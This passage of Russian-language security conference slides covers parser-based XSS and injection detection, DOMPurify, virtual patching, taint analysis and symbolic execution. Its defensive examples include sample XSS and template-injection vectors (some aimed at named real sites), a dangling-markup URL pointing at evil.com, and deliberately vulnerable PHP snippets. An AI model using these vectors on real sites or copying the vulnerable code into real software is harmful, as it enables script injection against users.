  154. Заголовок Ложные срабатывания • if all else fails call grandma

    • "Dr. Who" and coffee • "SWEATER DRESS" AND "CHRISTMAS” Пропуски • Неизвестные токены • Неизвестные контексты Недостатки Ivan Novikov. How to bypass libinjection in many WAF/NGWAF Reto Ischi. An Alternative Approach for Real-life SQLi Detecion
  155. Заголовок Впервые применение парсеров для обнаружения инъекций было описано в

    работе Роберта Хансена и Мередит Паттерсон «Guns and Butter: Towards Formal Axioms of Input Validation» для Black Hat 2005 «Сontext-free parse tree validation» • По известным запросам приложения грамматика для SQL преобразуется в грамматику для subSQL • По построенной грамматике генерируется парсер • Парсер subSQL распознает только цепочки подъязыка SQL этого приложения Robert J. Hansen, Meredith L. Patterson. Guns and Butter: Towards Formal Axioms of Input Validation Синтаксический подход
  156. Заголовок Ленивые – эвристическое использование готовых парсеров • DOMPurify •

    DOMSanitizer Грамматические • libdetection (Wallarm) • libdejection (PT AF, DBFW) • libprotection (PT AI) В идеале необходимо использовать парсеры целевых компьютерных систем, для предотвращения уязвимостей типа «parser differentials» Новые методы
  157. Заголовок Строка s - инъекция для языка L(G), если в

    построенном дереве разбора s по грамматике G содержится хотя бы одна опасная инструкция • 11111 • alert(1) Базовая идея – с использованием готового парсера построить дерево разбора; если дерево разбора содержит запрещенные узлы-нетерминалы, то исходная строка является инъекцией Характеристики подхода • Возможность использования готовых парсеров • Универсальность • Эвристичность • Различимость парсеров Ленивый метод
  158. Заголовок Пример: DOM-based XSS http://ex.com/foo.html#1 var input = location.hash.slice(1); document.write("<scr"+"ipt>var

    foo = "+ input +";</scr"+"ipt>"); <script> var foo = 1; <script> Program ExpressionStatement Literal
  159. Заголовок Пример: DOM-based XSS http://ex.com/foo.html#1;alert(1) var input = location.hash.slice(1); document.write("<scr"+"ipt>var

    foo = "+ input +";</scr"+"ipt>"); <script> var foo = 1;alert(1); <script> Program ExpressionStatement Literal ExpressionStatement CallExpression Identifier Literal
  160. Заголовок Запрещенные нетерминалы (опасные конструкции) в простейшем случае задаются перечнем

    типов узлов Для уменьшения числа ложных срабатываний могут быть использованы дополнительные проверки на основе родительских или дочерних узлов Что делать, когда дерево разбора не может быть построено? ""};alert(1);var f={t:" Поиск вредоносного кода
  161. Заголовок Вход: строка S, контекст CTX Выход: является ли S

    инъекцией в контексте CTX? 1. Построить tokens – список токенов s в CTX 2. Построить дерево разбора для S в CTX 3. Если в дереве есть запрещенные узлы, то S – инъекция 4. Иначе удалить из S следующий токен 5. Если S – непустая строка, то перейти на шаг 2 Метод поиска с левым приведением
  162. Заголовок Acorn Plugins function sanitize(dirty) { var acorn = require('acorn'),

    detected = false, tree ; acorn.plugins.detectCallExpression = function(parser) { parser.extend('finishNode', function(nextMethod) { return function(code, node) { if(node === 'CallExpression') { detected = true; } return nextMethod.call(this, code, node); } }) }; tree = acorn.parse(dirty, {plugins: {detectCallExpression: true}}); if (detected) { return 'xss'; } return dirty; } Acorn is designed support allow plugins which, within reasonable bounds, redefine the way the parser works. Plugins can add new token types and new tokenizer contexts (if necessary), and extend methods in the parser object
  163. Заголовок Esprima Syntax Delegate function sanitize(dirty) { var esprima =

    require('esprima'), detected = false, tree; tree = esprima.parse(dirty, {}, function(node, meta) { if(node.type === 'CallExpression') { detected = true; } }); if (detected) { return 'xss'; } return dirty; } sanitize(';alert(1);var f={t:') // 'xss' A powerful feature available in Esprima since version 3.0 is the ability to invoke a callback function after every syntax node in the abstract syntax tree is created, often referred as the syntax delegate Ariya Hidayat. On-the-fly JavaScript Syntax Node Inspection.
  164. Заголовок Пример nodes = {CallExpression} input = "});alert(1);var f=({t:" context

    = " tokens = {"", }, ), ;, alert, (, 1, ), ;, var, f, =, (, {, t, :, "} 2
  165. Заголовок Пример nodes = {CallExpression} input = "});alert(1);var f=({t:" context

    = " tokens = {"", }, ), ;, alert, (, 1, ), ;, var, f, =, (, {, t, :, "} vector = ""});alert(1);var f =({t:" parse(vector): Unexpected token (1:2) 3
  166. Заголовок Пример nodes = {CallExpression} input = "});alert(1);var f=({t:" context

    = " tokens = {"", }, ), ;, alert, (, 1, ), ;, var, f, =, (, {, t, :, "} vector = });alert(1);var f =({t:" parse(vector): Unexpected token (1:0) 4
  167. Заголовок Пример nodes = {CallExpression} input = "});alert(1);var f=({t:" context

    = " tokens = {"", }, ), ;, alert, (, 1, ), ;, var, f, =, (, {, t, :, "} vector = );alert(1);var f =({t:" parse(vector): Unexpected token (1:0) 5
  168. Заголовок Пример nodes = {CallExpression} input = "});alert(1);var f=({t:" context

    = " tokens = {"", }, ), ;, alert, (, 1, ), ;, var, f, =, (, {, t, :, "} vector = ;alert(1);var f =({t:" parse(vector): Program 6
  169. Заголовок Примеры обнаруживаемых векторов http://friendfeed.com/api/feed/public?callback=var WshShell=new ActiveXObject("WScript.Shell");WshShell.Exec("calc");// Internet Explorer Reflected

    File Download Reflected XSS on developer.uber.com via Angular template injection ES6 alert`1` https://developer.uber.com/docs/deep- linking?q=wrtz{{(_="".sub).call.call({}[$="constructor"].getOwnPropertyDescript or(_.__proto__,$).value,0,"alert(1)")()}}zzzz
  170. Заголовок Толерантность к ошибкам )},{0:prompt(1 Prompt.ml Challenge Hidden Level 4

    function escape(input) { // You know the rules and so do I input = input.replace(/"/g, ''); return '<body onload="think.out.of.the.box(' + input + ')">'; } return '<body onload="think.out.of.the.box()},{0:prompt(1)">'; "… the solution might work for some older versions of Chrome, while for others, a different vector would be needed…"
  171. Заголовок Толерантность к ошибкам nodes = {CallExpression} input = )},{0:prompt(1

    Program ExpressionStatement SequenceExpression … ObjectExpression Identifier CallExpression name: x
  172. Заголовок Используем толерантный к ошибкам парсер (Acorn loose parser) Это

    приводит к неизбежному росту числа ложных срабатываний • CallExpression: 123(1+1) Ограничиваются правила толерантности парсера Толерантность к ошибкам А. Перцев, Д. Колегов. Эвристический метод обнаружения DOM-based XSS с использованием толерантных синтаксических анализаторов
  173. Заголовок DOM и DOMParser DOMParser – интерфейс для парсинга и

    сериализации DOM var s = '<img src=1 "x" "y" onload="onload"="alert(1)" >'; var p = new DOMParser(); var d = p.parseFromString(s, 'text/html'); console.log(d.body.innerHTML); // IE 10 // <img onload="onload" src="1" "x"="" "y"="" ="alert(1)"=""> // FF // <img src="1" "x"="" "y"="" onload="onload" ="alert(1)"=""> // Chrome // <img src="1" "x"="" "y"="" onload="onload" ="alert(1)"="">
  174. Заголовок "DOMPurify is a DOM-only, super-fast, uber-tolerant XSS sanitizer for

    HTML, MathML and SVG" Адрес проекта https://github.com/cure53/DOMPurify Особенности • Точный механизм • Инструмент для разработчиков • Удаление вредоносного и запрещенного кода из HTML / MathML / SVG • Поддерживает механизм хуков DOMPurify
  175. Заголовок Что может DOMPurify Предотвращать атаки XSS (в том числе

    для jQuery) var dirty = '<a>123<b>456<script>alert(1)<\/script></b></a>789'; var clean = DOMPurify.sanitize(dirty, {FORBID_TAGS: ['a', 'b']}); clean; //123456789 var dirty = '<img src=x name=createElement><img src=y id=createElement>'; var clean = DOMPurify.sanitize(dirty); clean; // "<img src="x"><img src="y">" var dirty = '<img src="http://evil.com/log.cgi?'; var clean = DOMPurify.sanitize(dirty); clean; // "" Предотвращать атаки DOM Clobbering Предотвращать атаки Dangling Markup Injection
  176. Заголовок DOMPurify для WAF function isXSS(s) { var isClean =

    true; DOMPurify.sanitize(s); if (DOMPurify.removed.length > 0)) { return !isClean; } return isClean; } ε, dompurify.removed(x) ≠ 0 x, dompurify.removed(x) = 0 isXSS(x) =
  177. Заголовок Виртуальный патч – то, что предотвращает использование обнаруженной уязвимости

    к атаке • SAST • DAST Особенности • Использование механизма правил, а не сигнатур • Возможно использование сложных алгоритмов защиты (CSRF, IDOR) Виртуальный патчинг Ryan Barnett. WAF Virtual Patching Challenge
  178. Заголовок Знать как не должно быть: необходимые и достаточные условия

    наличия уязвимости Знать как есть: доказать наличие этих условий в анализируемом коде защищаемого приложения Устранить хотя бы одно из необходимых условий путем изменения исходного кода защищаемого приложения Как сгенерировать патч В. Кочетков. Автоматическая генерация патчей для уязвимого исходного кода
  179. Заголовок Знать как не должно быть: необходимые и достаточные условия

    наличия уязвимости Знать как есть: доказать наличие этих условий в защищаемом приложении Сделать невозможным выполнение хотя бы одного из необходимых условий путем изменения запросов к защищаемому приложению Как сгенерировать виртуальный патч
  180. Заголовок • Средствами xAST выполняется поиск уязвимостей веб- приложения •

    По найденным уязвимостям создается отчет • Отчет содержит перечень найденных уязвимостей и автоматически сгенерированные эксплойты • По полученным эксплойтам генерируются сигнатуры и итоговые правила виртуальных патчей Метод защиты
  181. Заголовок Пример 1: исходный код // page.php <?php $name =

    $_GET["name"]; ?> <html> <body> <div class="user"> <?php echo $name; ?> </div> </body> </html>
  182. Заголовок Пример 1: эксплойт // page.php <?php $name = $_GET["name"];

    ?> <html> <body> <div class="user"> <?php echo $name; ?> </div> </body> </html> http://example.com/blog/page.php?name=<svg/onload=alert(1)> Эксплоит:
  183. Заголовок Пример 1: отчет { "path": "/blog/page.php", "source": "/opt/app/www/blog/page.php", "type":

    "XSS", "exploit": "\r\nGET /blog/page.php/id=<svg/onload=alert(1)> HTTP/1.1\r\nHost: example.com\r\n", "params": { "param": { "src": "REQUEST_GET_ARGS", "payload": "<svg/onload=alert(1)>", "name": "id", "dependencies": {"dependency": [ "%3C", "%3E" ]} }}}
  184. Заголовок Пример 2: исходный код // page.php <html> <body> <?php

    $name = $_GET["name"]; $type = $_GET["type"]; $decoded_name = base64_decode($name); if (!$decoded_name) { echo "Error during ".$type." processing."; } else { … } ?> </body> </html>
  185. Заголовок Пример 2: эксплойт http://example.com/blog/page.php?type=<svg/onload=alert(1)>&name=$1 Эксплоит: // page.php <html> <body>

    <?php $name = $_GET["name"]; $type = $_GET["type"]; $decoded_name = ads_decode($name); if (!$decoded_name) { echo "Error during ".$type." processing."; } else { … } ?> </body> </html>
  186. Заголовок • Виртальный патчинг здесь неэффективен • Из-за неизвестного преобразования

    нет возможности сообщить WAF информацию о том, какие значения должны принимать оба параметра запроса для атаки • Более того, из-за неизвестного преобразования не сработают и все другие подходы Метод защиты
  187. Заголовок def analyze(code, data): if not vulnerable(code, data): # given

    configuration is secure else: # given configuration is vulnerable АНАЛИЗАТОР КОДА (ПРИМЕР 1/6)
  188. Заголовок def analyze(code, data): if not vulnerable(code, data): # given

    configuration is secure vulnerable_function_call() else: # given configuration is vulnerable АНАЛИЗАТОР КОДА (ПРИМЕР 2/6)
  189. Заголовок analyzer_code = """ def analyze(code, data): if not vulnerable(code,

    data): # given configuration is secure vulnerable_function_call() else: # given configuration is vulnerable """ АНАЛИЗАТОР КОДА (ПРИМЕР 3/6)
  190. Заголовок analyzer_code = """ def analyze(code, data): if not vulnerable(code,

    data): # given configuration is secure vulnerable_function_call() else: # given configuration is vulnerable """ eval(analyzer_code) АНАЛИЗАТОР КОДА (ПРИМЕР 4/6)
  191. Заголовок analyzer_code = """ def analyze(code, data): if not vulnerable(code,

    data): # given configuration is secure vulnerable_function_call() else: # given configuration is vulnerable """ eval(analyzer_code) analyze(analyzer_code, analyzer_code) АНАЛИЗАТОР КОДА (ПРИМЕР 5/6)
  192. Заголовок analyzer_code = """ def analyze(code, data): if not vulnerable(code,

    data): # given configuration is secure vulnerable_function_call() else: # given configuration is vulnerable """ eval(analyzer_code) analyze(analyzer_code, analyzer_code) ¯\_(ツ)_/¯ АНАЛИЗАТОР КОДА (ПРИМЕР 6/6)
  193. Заголовок n = … # n∈ℕ def analyze(code, data): while

    n: sleep(n) n -= 1 if not vulnerable(code, data): # given configuration is secure vulnerable_function_call() else: # given configuration is vulnerable И сколько таких «частных» случаев теперь возможно? ЧАСТНЫЙ СЛУЧАЙ?
  194. Заголовок Проблема анализа защищённости решаема для программ: • эквивалентных конечным

    автоматам (за PTIME) • сводимых к конечным автоматам за счёт накладывания ограничений на размеры доступной памяти, размерность переменных, количество итераций циклов и т.п. (за EXPTIME) Все существующие анализаторы используют подходы, основанные на аппроксимации модели исследуемого кода. Любой статанализатор легко «обламывается» не более, чем 3 строчками кода СТАТАНАЛИЗАТОРЫ – ИНДУСТРИЯ ОБМАНА?
  195. Заголовок Интерпретация кода в рамках семантической модели, отличающейся от модели

    формального языка. Основной инструмент аппроксимации кода. Абстрактная интерпретация
  196. Заголовок Построим свою собственную арифметику со знаком и формулами: (+a)

    = (+) (-a) = (-) (-a) * (+b) = (-) (-a) / (+b) = (-) (-a) + (+b) = a ≤ b ⇒ (+), a > b ⇒ (-) И применим её: -42 / 8 * 100500 + x = x ≥ -527625 ⇒ (+), x < -527625 ⇒ (-) Абстрактная интерпретация на пальцах
  197. Заголовок Применяется для доказательства факта зависимости потоков данных различных типов.

    Частный случай – доказательство зависимости выходных данных от входных aka taint-анализ. Анализ зависимостей кода
  198. Заголовок Taint-анализ (1/9) var name = Request.Params["name"]; var key1 =

    Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  199. Заголовок Taint-анализ (2/9) var name = Request.Params["name"]; var key1 =

    Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  200. Заголовок Taint-анализ (3/9) var name = Request.Params["name"]; var key1 =

    Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  201. Заголовок Taint-анализ (4/9) var name = Request.Params["name"]; var key1 =

    Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  202. Заголовок Taint-анализ (5/9) var name = Request.Params["name"]; var key1 =

    Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  203. Заголовок Taint-анализ (6/9) var name = Request.Params["name"]; var key1 =

    Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  204. Заголовок Taint-анализ (7/9) var name = Request.Params["name"]; var key1 =

    Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  205. Заголовок Taint-анализ (8/9) var name = Request.Params["name"]; var key1 =

    Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  206. Заголовок Taint-анализ (9/9) var name = Request.Params["name"]; var key1 =

    Request.Params["key1"]; var parm = Request.Params["parm"]; var data = string.IsNullOrEmpty(parm) ? new char[0]: Convert.FromBase64String(parm); string str1; if (name + "in" == "admin") { if (key1 == "validkey") { str1 = Encoding.UTF8.GetString(data); } else { str1 = "Wrong key!"; } Response.Write(str1); }
  207. Заголовок • Невозможно автоматизировать верификацию результатов. • Не учитываются условия

    достижимости опасной операции. • Семантика трансформирующих операций определяется исключительно базой знаний. • Подход применим только к классам уязвимостей к атакам, основанным на передаче в опасную операцию конкретных значений аргументов. Недостатки taint-анализа
  208. Заголовок • Символическое выполнение – абстрактная интерпретация кода в рамках

    семантической модели потоков вычисления. Roberto Baldoni, Emilio Coppa, Daniele Cono D'Elia, Camil Demetrescu, Irene Finocchi, «A Survey of Symbolic Execution Techniques» (https://arxiv.org/abs/1610.00502) • Конкретное выполнение – выполнение отдельных фрагментов кода в заданном контексте. Символическое и конкретное выполнение
  209. Заголовок 2x^2 + 4 = 12 2x^2 = 12 -

    4 2x^2 = 12 - 4 x^2 = (12 - 4) / 2 x = sqrt((12 - 4) / 2) x = sqrt((8) / 2) x = sqrt(4) x = 2 Символическое и конкретное выполнение (пример)
  210. Заголовок Сущность абстрактной интерпретации, включающая: • область видимости переменных (условные

    множества их достижимых значений); • условие достижимости; • ссылку на вышележащий контекст; • стратегию взаимодействия с областями видимости вышележащих контекстов. Контексты символического выполнения
  211. Заголовок int main(int z) { int a = 10; if

    (z > 5) { a = z - 5; } else { a = z + 5; } return a; } Контексты (1/8) {}
  212. Заголовок int main(int z) { int a = 10; if

    (z > 5) { a = z - 5; } else { a = z + 5; } return a; } Контексты (2/8) true ⇒ { true ⇒ z, }
  213. Заголовок int main(int z) { int a = 10; if

    (z > 5) { a = z - 5; } else { a = z + 5; } return a; } Контексты (3/8) true ⇒ { true ⇒ z, true ⇒ a = 10 }
  214. Заголовок int main(int z) { int a = 10; if

    (z > 5) { a = z - 5; } else { a = z + 5; } return a; } Контексты (4/8) z > 5 ⇒ { true ⇒ z, z > 5 ⇒ a = z - 5 }
  215. Заголовок int main(int z) { int a = 10; if

    (z > 5) { a = z - 5; } else { a = z + 5; } return a; } Контексты (5/8) z ≤ 5 ⇒ { true ⇒ z, z ≤ 5 ⇒ a = z + 5 }
  216. Заголовок int main(int z) { int a = 10; if

    (z > 5) { a = z - 5; } else { a = z + 5; } return a; } Контексты (6/8) true ⇒ { true ⇒ z, z > 5 ⇒ a = z - 5 z ≤ 5 ⇒ a = z + 5 }
  217. Заголовок int main(int z) { int a = 10; if

    (z > 5) { a = z - 5; } else { a = z + 5; } return a; } Контексты (7/8) true ⇒ { true ⇒ z, z > 5 ⇒ a = z - 5 z ≤ 5 ⇒ a = z + 5 }
  218. Заголовок int main(int z) { int a = 10; if

    (z > 5) { a = z - 5; } else { a = z + 5; } return a; } Контексты (8/8) true ⇒ { true ⇒ z, z > 5 ⇒ a = z - 5 z ≤ 5 ⇒ a = z + 5 }
  219. Заголовок • Глобальные • Глобальный • Типовой • Экземплярный •

    Локальные • Функциональный • Операторный • Условный • Циклический Типы контекстов
  220. Заголовок Кондиционал – опциональное множество всех возможных значений переменной Кондиционализация

    – замена неизвестных переменных в формуле их кондиционалами: true ⇒ { return a true ⇒ z, z > 5 ⇒ a = z - 5 z ≤ 5 ⇒ a = z + 5 } return true ⇒ { true ⇒ z, z > 5 ⇒ z – 5, z ≤ 5 ⇒ z + 5 } Кондиционализация
  221. Заголовок Разложение формулы, содержащей кондиционалы, на N формул, не содержащих

    кондиционалы с аггрегированием условий для каждой из них: return true ⇒ { true ⇒ z, z > 5 ⇒ z – 5, z ≤ 5 ⇒ z + 5 } return z > 5 ⇒ { z – 5 } return z ≤ 5 ⇒ { z + 5 } Опционализация
  222. Заголовок Marek Trtík, PHD Thesis: «Symbolic Execution and Program Loops»

    (https://is.muni.cz/th/329313/fi_d/trtik_phdThesis.pdf) Циклы / рекурсия?
  223. Заголовок Учебный проект с реализацией абстрактного интерпретатора подможества языка C

    (http://jamesvanboxtel.com/projects/minic- compiler/minic.pdf) https://github.com/PositiveTechnologies/mantaray Mantaray
  224. Заголовок • Single-pass режим интерпретации. • Межпроцедурный анализ с поддержкой

    глобального состояния. • Упрощение формул достижимости SMT-солвером. • Технический долг: • циклы; • указатели; • детектирование NPD и инъекций; Mantaray: особенности
  225. Заголовок Copyrights В презентации использованы следующие материалы: В. Кочетков. Как

    разработать защищенное веб-приложение и не сойти с ума? Д. Колегов, А. Реутов. Waf.js: как защитить веб-приложение с помощью JavaScript. А. Петухов. Обзор ограничений современных технологий в области ИБ. I. Markovic. HTTP Parameter Contamination. I. Ristic. Protocol-Level Evasaion of Web Application Firewalls. Z. Su, G. Wassermann. The Essence of Command Injection Attacks in Web Applications. D. Kolegov, O. Broslavsky, N. Oleksov. White-Box HMAC S. Bratus, M. Patterson, etc. Security Applications of Formal Language Theory S. Bratus, M. Patterson, etc. A Taxonomy of LangSec Errors and How to Expunge Them